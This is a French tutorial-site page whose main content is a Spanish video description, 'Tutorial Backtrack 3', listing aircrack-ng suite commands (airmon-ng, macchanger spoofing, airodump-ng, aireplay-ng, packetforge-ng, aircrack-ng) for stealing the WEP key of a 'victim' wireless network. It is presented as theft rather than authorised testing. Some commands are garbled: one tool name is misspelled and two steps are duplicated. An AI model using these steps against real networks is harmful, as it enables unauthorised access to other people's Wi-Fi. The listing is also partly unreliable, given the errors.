Domaine : tutoriel
Tag : tuto backtrack
Aller à l'accueil


TAGS SPECIALISES :

tuto filezilla
camstudio tuto
tutoriel camstudio
virtualbox tuto
tuto wamp
tuto brutus
tuto pdanet
tuto installous
tutoriel picasa
tuto fraps
thunderbird tutoriel
backtrack tuto
tuto ubuntu
tuto python
wireshark tuto
tuto picasa
minecraft tuto
tuto wireshark
limera1n tuto
inkscape tuto
tutoriel dvd shrink
tuto greenpoison
tuto avatar
tuto daemon tools
tuto cydia
tuto virtualdubmod
tuto pixel art
tuto hamachi
tuto filezilla server
tutoriel virtualdub
tutoriel opengl
backtrack 4 tuto
tuto redsnow
tuto camstudio
tutoriel ubuntu
tuto virtualdub
opengl tuto
freeware tuto
python tutoriel
tutoriel wireshark



Tutorial Backtrack 3





En este video les enseño a como robar una clave WEP con Backtrack 3

En este caso usare una tarjeta: D'Link DWA-110 que tiene chipset Ralink, por lo tanto me basaré en ella y su interface tiene el nombre rausb0 (rausb0, puede ser la interface de tu adaptador ej; wlan0

Comandos:

1: Ver tarjetas Wi-Fi conectadas al PC

airmon-ng

2: Parar modo monitor existente

airmon-ng stop rausb0

3: Poner la tarjeta en modo "down"

ifconfig rausb0 down

4: Cambiar la MAC de nuestro adaptador Wi-Fi

macchanger -m 00:11:22:33:44:55 rausb0

5: Volver a poner la tarjeta en modo monitor

airmo-ng start rausb0

6: Buscar redes víctimas y anotar sus datos

airodump-ng rausb0

7: Capturar "DATA"

airodump-ng -c "Canal de la víctima" -w pruebas rausb0

EJ:

airodump-ng -c 6 -w pruebas rausb0

8: Desautenticar la red, para poder empezar a agilizar la captura

aireplay-ng -5 -b "MAC de la víctima" -h 00:11:22:33:44:55 rausb0

EJ:

aireplay-ng -5 -b 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 rausb0

9: Segundo paso de agilización de captura

aireplay-ng -5 -b "MAC de la víctima" -h 00:11:22:33:44:55 rausb0

EJ:

aireplay-ng -5 -b 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 rausb0

10: Segundo paso de agilización

packetforge-ng -0 -a "Mac víctima" -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y "Archivo .xor" ARP rausb0

EJ:

packetforge-ng -0 -a 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragmentXXXXXXX-XXX.xor ARP rausb0

Nota: el archivo .xor será diferente

11: Tercer paso de agilización

aireplay-ng -2 -r ARP rausb0

12: Crackear red

aircrack-ng pruebas-01.cap

Y listo, tienes la clave WEP :)

code pour embarquer la vidéo : >>>    http://www.youtube.com/embed/nSUwvxRSCos    <<<






TAGS GENERAUX :

  tutoriel spring  tuto vmware  vmware tuto  tuto active directory  tuto sql